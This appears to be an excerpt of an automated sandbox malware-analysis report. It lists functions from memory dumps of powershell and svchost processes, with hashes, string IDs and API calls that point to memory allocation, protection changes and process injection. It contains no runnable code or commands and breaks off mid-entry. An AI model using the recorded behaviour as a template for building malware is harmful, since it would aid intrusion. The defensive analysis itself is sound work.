                                                                                                                • Instruction ID: e077d2f307e3a5f8c2ccf0fbe3104116f8b436c3baa9def2d956b42693ad2bd5
                                                                                                                • Opcode Fuzzy Hash: 1d3403922367b2476d2e18775023ab59dafae935057b322bc2a52de78edc1ab3
                                                                                                                • Instruction Fuzzy Hash: E8A127F17003069FEB258B65D8607AA7BA1FFC6211F9484FAD845CB281DB31DC42C7A1
                                                                                                                Function 07B1BEC0 Relevance: 11.5, Strings: 9, Instructions: 295COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1783015081.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_7b10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'q$4'q$4'q$4'q$tPq$tPq$$q$$q$$q
                                                                                                                • API String ID: 0-402839268
                                                                                                                • Opcode ID: 69679e92c31a58eee5db9af14a52a4bc89fb776fba10392c269b5b8520ddac63
                                                                                                                • Instruction ID: e2135e237a4136fa0a16a4415012a502a52758b61b45a5f4509007f7bbba3f62
                                                                                                                • Opcode Fuzzy Hash: 69679e92c31a58eee5db9af14a52a4bc89fb776fba10392c269b5b8520ddac63
                                                                                                                • Instruction Fuzzy Hash: 29A128F1B4424ADFEB258F65D4046ABBFA2FF86311F59C4EAE8058B241C731D851CBA1
                                                                                                                Function 07B1CCA5 Relevance: 11.5, Strings: 9, Instructions: 209COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1783015081.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_7b10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'q$4'q$d%q$d%q$d%q$d%q$tPq$tPq$$q
                                                                                                                • API String ID: 0-328666906
                                                                                                                • Opcode ID: 0a1c4c62efe455150c104feb3fdf726de54f5d9a6d7148e55ef540ed01712381
                                                                                                                • Instruction ID: 6a6c067461454c3b95a06e752ecf86deebec3a3ba7bf45fe8dba59afa520b9f9
                                                                                                                • Opcode Fuzzy Hash: 0a1c4c62efe455150c104feb3fdf726de54f5d9a6d7148e55ef540ed01712381
                                                                                                                • Instruction Fuzzy Hash: 7B7119F1B503169FEB248B65D41076ABFA2EF85610F548899E8059B381DB31EC45C7B1
                                                                                                                Function 07B1D524 Relevance: 9.0, Strings: 7, Instructions: 205COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1783015081.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_7b10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'q$tPq$tPq$$q$(q$(q$(q
                                                                                                                • API String ID: 0-3442133670
                                                                                                                • Opcode ID: 120624088eb6b4074ef04f917edc6265fca15db7a530ea1f6449253a691bc9ea
                                                                                                                • Instruction ID: d478f34cd261b326b88229be8c140fd3ee87b84fd788fe458e1681c5f0735300
                                                                                                                • Opcode Fuzzy Hash: 120624088eb6b4074ef04f917edc6265fca15db7a530ea1f6449253a691bc9ea
                                                                                                                • Instruction Fuzzy Hash: A77192F4B00206DFEB248F15C545BAAB7F1EF85715F9984D9E805AB291C731EC40CBA1
                                                                                                                Function 07B1D1DE Relevance: 8.9, Strings: 7, Instructions: 163COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1783015081.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_7b10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'q$TQq$TQq$tPq$$q$$q$$q
                                                                                                                • API String ID: 0-2980145124
                                                                                                                • Opcode ID: 4214aee88bacd2f0055c7f5c6c1cd5ab24594062ad1a3becf44a9dad85316010
                                                                                                                • Instruction ID: 362b73f98a21a686d5c48eec02aedf2f4e48ad1ae3e05f3be6de221143eba97d
                                                                                                                • Opcode Fuzzy Hash: 4214aee88bacd2f0055c7f5c6c1cd5ab24594062ad1a3becf44a9dad85316010
                                                                                                                • Instruction Fuzzy Hash: 3F51A0F1700206DFFB24CE05D544BAAB7A2FF82311F9985E6E8159B290C735ED85CBA1
                                                                                                                Function 07B1D1E8 Relevance: 8.9, Strings: 7, Instructions: 153COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1783015081.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_7b10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'q$TQq$TQq$tPq$$q$$q$$q
                                                                                                                • API String ID: 0-2980145124
                                                                                                                • Opcode ID: fbb1c00a727b4391850e8122f2636bbe0376e6369dde18eca9fb21e19d99c0a1
                                                                                                                • Instruction ID: 1f814febc0d2ec9f34f60b0ef707ed793d596295af3b4575ac98b89d8cf3e531
                                                                                                                • Opcode Fuzzy Hash: fbb1c00a727b4391850e8122f2636bbe0376e6369dde18eca9fb21e19d99c0a1
                                                                                                                • Instruction Fuzzy Hash: F0519EF070020ADFFB24CE05D544BAAB3A2FF46311F9985E6E8159B290C735ED81CBA1
                                                                                                                Function 07B1DBF0 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1783015081.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_7b10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'q$tPq$$q$$q$$q
                                                                                                                • API String ID: 0-838716513
                                                                                                                • Opcode ID: b51a9f650c8d0f056a9a5670bd24f162a0c5c00829dd38909513a15e01463660
                                                                                                                • Instruction ID: 15f1403072cedd0d51008f81ad4bf7d934fcfbde5cb1ca78a1e2c8f278805a4e
                                                                                                                • Opcode Fuzzy Hash: b51a9f650c8d0f056a9a5670bd24f162a0c5c00829dd38909513a15e01463660
                                                                                                                • Instruction Fuzzy Hash: C261A1F1710206DFFF288E05C5457BA77A2EF55312F9884E9E8045B294CB75ED80CBA1
                                                                                                                Function 07B11C10 Relevance: 6.4, Strings: 5, Instructions: 138COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1783015081.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_7b10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'q$4'q$$q$$q$$q
                                                                                                                • API String ID: 0-170447905
                                                                                                                • Opcode ID: b103abe51ac0d0b8c12ddd850d5bb2255e9452c61a6e1d647eb9bdb9ba29168a
                                                                                                                • Instruction ID: b719ddcc166a2f45ff5a6919c757bbe807da1a424e20ad2b299b1d0ea325dec4
                                                                                                                • Opcode Fuzzy Hash: b103abe51ac0d0b8c12ddd850d5bb2255e9452c61a6e1d647eb9bdb9ba29168a
                                                                                                                • Instruction Fuzzy Hash: EF4139F170031F9BFB34566D641137AB796EFC6211FA489AADA428F281DF31C846C351
                                                                                                                Function 07B1503D Relevance: 6.4, Strings: 5, Instructions: 109COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1783015081.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_7b10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'q$4'q$$q$$q$$q
                                                                                                                • API String ID: 0-170447905
                                                                                                                • Opcode ID: cbb0ab4675f4a234111337f29794a704c519e17014779f714ddf8eed71664756
                                                                                                                • Instruction ID: dcd0d1b7584f6c1efb2570c85fd2fe3408869ab967cd7145677ca86a6d6b8175
                                                                                                                • Opcode Fuzzy Hash: cbb0ab4675f4a234111337f29794a704c519e17014779f714ddf8eed71664756
                                                                                                                • Instruction Fuzzy Hash: 1B3108F2B04307CFFB3646A5A4042B6B7A1EFC6211BA984EBD8428B141EF36C471C791
                                                                                                                Function 07B1CDA6 Relevance: 6.3, Strings: 5, Instructions: 85COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1783015081.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_7b10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'q$d%q$d%q$d%q$tPq
                                                                                                                • API String ID: 0-706544200
                                                                                                                • Opcode ID: 2c6190b943881a22f01e6314dd57fb7aba9777d3a25c86c37de68cd7a4e03002
                                                                                                                • Instruction ID: f0167605753aaa429dac6670dfb3f45b7e99d4d67ad894e6df0cdd60dd37904c
                                                                                                                • Opcode Fuzzy Hash: 2c6190b943881a22f01e6314dd57fb7aba9777d3a25c86c37de68cd7a4e03002
                                                                                                                • Instruction Fuzzy Hash: C831BFB5A40205DFEB24DF54D450A69FBA2FF88610F69C599E905AF340C731EC11CBA2
                                                                                                                Function 07B1E260 Relevance: 5.3, Strings: 4, Instructions: 299COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1783015081.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_7b10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'q$4'q$x.~k$-~k
                                                                                                                • API String ID: 0-740126814
                                                                                                                • Opcode ID: 77199f91e555e4f4ea2307dc9ac2223f5ac672c47e980672f1a57b2390ccd83d
                                                                                                                • Instruction ID: 260d0d54bc982b553f70990f5fc860860fe0400d585a5e8fdb9c567ccedd1a9a
                                                                                                                • Opcode Fuzzy Hash: 77199f91e555e4f4ea2307dc9ac2223f5ac672c47e980672f1a57b2390ccd83d
                                                                                                                • Instruction Fuzzy Hash: D9C18DF0A00205DFEB24DB54C550B6EBBB2EFC8715F958869E9016B794CB32F842CB51
                                                                                                                Function 07B19510 Relevance: 5.3, Strings: 4, Instructions: 256COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1783015081.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_7b10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'q$4'q$4'q$4'q
                                                                                                                • API String ID: 0-4210068417
                                                                                                                • Opcode ID: 5a747db5e865943e5798a570ad06877fc3337605cbe3fbccb64b621c5a8160ad
                                                                                                                • Instruction ID: d27dcfe70a473c7fb0c9d7737e3e309e27000e6d71ff7b98dda80f116f60df37
                                                                                                                • Opcode Fuzzy Hash: 5a747db5e865943e5798a570ad06877fc3337605cbe3fbccb64b621c5a8160ad
                                                                                                                • Instruction Fuzzy Hash: 04811CF1B043C68FE7258F6994212A67BB1DFC6211F9484FBC405CB241DB31E846C7A2
                                                                                                                Function 07B1DFB8 Relevance: 5.1, Strings: 4, Instructions: 115COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1783015081.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_7b10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: XRq$XRq$tPq$$q
                                                                                                                • API String ID: 0-1549039314
                                                                                                                • Opcode ID: 5ec5ebdab67c53e38d64633819b548945613e78568ea4851b4298d0af36fbf9b
                                                                                                                • Instruction ID: 3455495e4a95f85b041852b9825f2ac7dfc9c3d985d8765ed4c036105d79f19a
                                                                                                                • Opcode Fuzzy Hash: 5ec5ebdab67c53e38d64633819b548945613e78568ea4851b4298d0af36fbf9b
                                                                                                                • Instruction Fuzzy Hash: D74184F1A00206DFEB248F49C549AA9B7F2EF49712F99C0E9EC056B250C771ED41CB51
                                                                                                                Function 07B10E08 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1783015081.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_7b10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $q$$q$$q$$q
                                                                                                                • API String ID: 0-4102054182
                                                                                                                • Opcode ID: a70e3155739d2ac893f1e517fdd36c3c99ef6fd71421c699411676665bb77993
                                                                                                                • Instruction ID: dc2b8789a80407516666d2a9a3d0cc88aff2b6fe8e39bb3998bd7f886004199a
                                                                                                                • Opcode Fuzzy Hash: a70e3155739d2ac893f1e517fdd36c3c99ef6fd71421c699411676665bb77993
                                                                                                                • Instruction Fuzzy Hash: 302105F3B1030A5BF734666B980172776DADBC5711FA4C46AE909CB385DE72D88183A1
                                                                                                                Function 07B119F9 Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1783015081.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_7b10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'q$4'q$$q$$q
                                                                                                                • API String ID: 0-3199993180
                                                                                                                • Opcode ID: 2421b6ddc6b7b5c8969f461202f5f7895a7e6801032e660bd253fa03f3c54f92
                                                                                                                • Instruction ID: 323bde22e833cd8439b52b5a5aa2a58d5465746c60327b7147b860099f2dacc5
                                                                                                                • Opcode Fuzzy Hash: 2421b6ddc6b7b5c8969f461202f5f7895a7e6801032e660bd253fa03f3c54f92
                                                                                                                • Instruction Fuzzy Hash: 0C012B6171834E8FD326122C28302A56F629FC361076E91EBD551CF342CD258C07C3A2

                                                                                                                Executed Functions

                                                                                                                Function 02D302D8 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 169memoryfileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 02D30326
                                                                                                                  • Part of subcall function 02D300A4: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 02D300CD
                                                                                                                  • Part of subcall function 02D300A4: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02D30279
                                                                                                                • VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 02D30378
                                                                                                                • VirtualProtect.KERNELBASE(0000002C,?,00000040,?), ref: 02D303E7
                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02D30407
                                                                                                                • MapViewOfFile.KERNELBASE(?,00000004,00000000,00000000,00000000), ref: 02D3042E
                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02D30456
                                                                                                                • CloseHandle.KERNELBASE(?), ref: 02D30471
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000003.1943778103.0000000002D30000.00000040.00000001.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_3_2d30000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Virtual$Alloc$Free$CloseFileHandleProtectView
                                                                                                                • String ID: ,
                                                                                                                • API String ID: 3867569247-3772416878
                                                                                                                • Opcode ID: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
                                                                                                                • Instruction ID: abfae442878f088ef8cfd681e78854524e977d53f799d01047c5e5bdeb623e3a
                                                                                                                • Opcode Fuzzy Hash: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
                                                                                                                • Instruction Fuzzy Hash: 03610CB5900209EFDB21DFA5C884ADEBBB9FF08365F14C51AE959A7240D730EA41CF60
                                                                                                                Function 02D300A4 Relevance: 2.7, APIs: 2, Instructions: 163memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 02D300CD
                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02D30279
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000003.1943778103.0000000002D30000.00000040.00000001.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_3_2d30000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Virtual$AllocFree
                                                                                                                • String ID:
                                                                                                                • API String ID: 2087232378-0
                                                                                                                • Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                • Instruction ID: 8f00e48460780bb3ee4c64b4c67de5952a7da6d5cd6bc719ef75f20ef825ce9e
                                                                                                                • Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                • Instruction Fuzzy Hash: 67717A75A04249DFDB42CF98C981BEDBBF0BB09315F288095E5A5FB341C374AA91CB64

                                                                                                                Non-executed Functions

                                                                                                                Function 02D30283 Relevance: .0, Instructions: 35COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000003.1943778103.0000000002D30000.00000040.00000001.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_3_2d30000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                                                • Instruction ID: 0700a9746b41f42d3ef446d498202c88c6b774b4c955a0ea82dd9692542c1ba8
                                                                                                                • Opcode Fuzzy Hash: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                                                • Instruction Fuzzy Hash: D7F0F67DA02200CFC716CF09C544CA577F6FB80715B248495E404EB361D370DD44C790

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:23.7%
                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                Signature Coverage:45%
                                                                                                                Total number of Nodes:20
                                                                                                                Total number of Limit Nodes:0
                                                                                                                execution_graph 418 24f6a2a19b4 419 24f6a2a19c7 418->419 420 24f6a2a19fb 419->420 421 24f6a2a19e6 VirtualFree 419->421 421->420 422 24f6a2a1cf4 424 24f6a2a1d19 422->424 423 24f6a2a1fa1 424->423 431 24f6a2a15c0 424->431 426 24f6a2a1f98 CloseHandle 426->423 427 24f6a2a1f88 NtAcceptConnectPort 427->426 428 24f6a2a1e3a 428->426 428->427 434 24f6a2a1aa4 428->434 430 24f6a2a1f76 430->427 433 24f6a2a15f4 NtAcceptConnectPort 431->433 433->428 435 24f6a2a1aef 434->435 437 24f6a2a1b10 435->437 438 24f6a2a1870 435->438 437->430 440 24f6a2a1889 438->440 439 24f6a2a1949 439->437 440->439 441 24f6a2a1930 GetProcessMitigationPolicy 440->441 441->439

                                                                                                                Callgraph

                                                                                                                Executed Functions

                                                                                                                Function 00007DF45262E910 Relevance: 18.1, APIs: 6, Strings: 4, Instructions: 563nativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AcceptConnectPort$DuplicateHandlecallocfree
                                                                                                                • String ID: ,$,$H$H
                                                                                                                • API String ID: 2459737528-3578512806
                                                                                                                • Opcode ID: a9947afaaa98f1177199e84ab3dbda009d5fccaad9051c9b13383d687201c208
                                                                                                                • Instruction ID: 95274d06d5f973aa8d726d0ef912aa291d3b383c0485a52d339a0ff65e9c44fc
                                                                                                                • Opcode Fuzzy Hash: a9947afaaa98f1177199e84ab3dbda009d5fccaad9051c9b13383d687201c208
                                                                                                                • Instruction Fuzzy Hash: DF02603061CB848BD764EB58D88566EB7E1FBD8301F50493FE98EC3391DA74E9458B82
                                                                                                                Function 00007DF45262F180 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 156nativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AcceptConnectPathPort$NameName_freemalloc
                                                                                                                • String ID: $0$@
                                                                                                                • API String ID: 3298263305-2347541974
                                                                                                                • Opcode ID: 41dfd5aa33c42447b157757b265737d871a333bd75be70a4a10737d4b23bee9e
                                                                                                                • Instruction ID: 51356a42d5aba31853655fc0b1cccda39aff7b05033ea099d986ebbe8fc46ae1
                                                                                                                • Opcode Fuzzy Hash: 41dfd5aa33c42447b157757b265737d871a333bd75be70a4a10737d4b23bee9e
                                                                                                                • Instruction Fuzzy Hash: 44516E345287888FD764EF5894867AE77E0FB89700F10452FE88EC2341DB78E5858B83
                                                                                                                Function 00007DF45262F32C Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 158nativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AcceptConnectPortfree
                                                                                                                • String ID: $0$@
                                                                                                                • API String ID: 2184535508-2347541974
                                                                                                                • Opcode ID: 3f154c0dcd698207b74ecbf3349ee8280ba9b90b83e006a876e2d17fed3398f1
                                                                                                                • Instruction ID: 4c21aac09a0f2da005e137e3d3bce108145a7f35607502446da73974dbd5cea9
                                                                                                                • Opcode Fuzzy Hash: 3f154c0dcd698207b74ecbf3349ee8280ba9b90b83e006a876e2d17fed3398f1
                                                                                                                • Instruction Fuzzy Hash: 9F511B3060CB898FE764EB68D4547ABB7E5FB98341F10492EE88EC2391DBB4D5458B42
                                                                                                                Function 00007DF452620B80 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFind$DirectoryFirstNextRemove
                                                                                                                • String ID: \
                                                                                                                • API String ID: 2722548352-2967466578
                                                                                                                • Opcode ID: aa0ec3aa504d6ef0e5320522a7ffa5ee1f0828fe674872a74d1c1d53faa5203f
                                                                                                                • Instruction ID: d6dc890b28a9700b29e6112a3a4f7b1000dc56d954d63ee490bb4e10e8e52ccd
                                                                                                                • Opcode Fuzzy Hash: aa0ec3aa504d6ef0e5320522a7ffa5ee1f0828fe674872a74d1c1d53faa5203f
                                                                                                                • Instruction Fuzzy Hash: D7416131608988CFDB45EF24DCC89EA77A5FBA4701F140666D84BDA265DF38A948CB80
                                                                                                                Function 00007DF4526208CC Relevance: 6.2, APIs: 4, Instructions: 232processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$Create$CodeDesktopExitTerminate
                                                                                                                • String ID:
                                                                                                                • API String ID: 3114477661-0
                                                                                                                • Opcode ID: d9c65f78b88761f55749ee4c73d5915ec55cc6603792b3611b226317cd9e6f4d
                                                                                                                • Instruction ID: 836be905eed1fa20f6b2b07b9bdf2bb89ee9496343613872552329b7da7ec73a
                                                                                                                • Opcode Fuzzy Hash: d9c65f78b88761f55749ee4c73d5915ec55cc6603792b3611b226317cd9e6f4d
                                                                                                                • Instruction Fuzzy Hash: D471403051CB888FE764EF28D8497AFB7E5FB94711F10062EE88BD3291DB7495458B42
                                                                                                                Function 00007DF4526259B0 Relevance: 4.6, APIs: 3, Instructions: 110pipeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: NamedPipe$BindCallbackCompletionConnectCreate
                                                                                                                • String ID:
                                                                                                                • API String ID: 2502124517-0
                                                                                                                • Opcode ID: 64bc60262aa007af45c0078f76809d5417a24a6d2b7390d918a99979fd05e311
                                                                                                                • Instruction ID: 1025e9819dd3f5a688346cd26952cb59122e8ecbef77759c3754e34e6d08206d
                                                                                                                • Opcode Fuzzy Hash: 64bc60262aa007af45c0078f76809d5417a24a6d2b7390d918a99979fd05e311
                                                                                                                • Instruction Fuzzy Hash: 20317230618A488FD7A4EF28D8D879A77E5FB94310F50462BE85BC22D0DF38D945CB81
                                                                                                                Function 00007DF45260286C Relevance: 3.3, APIs: 2, Instructions: 293threadinjectionCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000003.2457794538.00007DF452601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF452601000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_3_7df452601000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleSuspendThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1038686644-0
                                                                                                                • Opcode ID: 1f8ece1503dc4297b761fc8aeeb38f081f212776847475056979e89073c5c51b
                                                                                                                • Instruction ID: bb1d260085c33c507403bc8d8c471f088fbfdc1c4fd5c77574d1d5bc1e088876
                                                                                                                • Opcode Fuzzy Hash: 1f8ece1503dc4297b761fc8aeeb38f081f212776847475056979e89073c5c51b
                                                                                                                • Instruction Fuzzy Hash: 8891E630A0CA554BEB68AB19D89526E73E1FF58310F14416BDC8FC7785DA38FA42DB81
                                                                                                                Function 0000024F6A2A1CF4 Relevance: 3.3, APIs: 2, Instructions: 278nativeCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.2458604547.0000024F6A2A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000024F6A2A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_24f6a2a0000_svchost.jbxd
                                                                                                                Similarity
